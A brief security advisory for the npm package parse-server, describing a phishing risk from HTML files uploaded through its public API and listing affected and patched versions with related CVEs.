Description
Phishing attack vulnerability by uploading malicious files. A malicious user could upload a HTML file to Parse Server via its public API. That HTML file would then be accessible at the internet domain at which Parse Server is hosted. The URL of the the uploaded HTML could be shared for phishing attacks.
Recommendation
Update the parse-server package to the latest compatible version. Followings are version details:
Affected version(s): **>= 6.0.0, < 6.1.1 < 5.4.4** Patched version(s): **6.1.1 5.4.4**
References
Related Issues
- Parse Server allows public `explain` queries which may expose sensitive database performance information and schema deta - CVE-2025-64502
- angular vulnerable to super-linear runtime due to backtracking - CVE-2024-21490
- Parse Server before v3.4.1 vulnerable to Denial of Service - CVE-2019-1020012
- Happy DOM: VM Context Escape can lead to Remote Code Execution - CVE-2025-61927
- Tags:
- npm
- parse-server
Anything's wrong? Let us know Last updated on November 05, 2023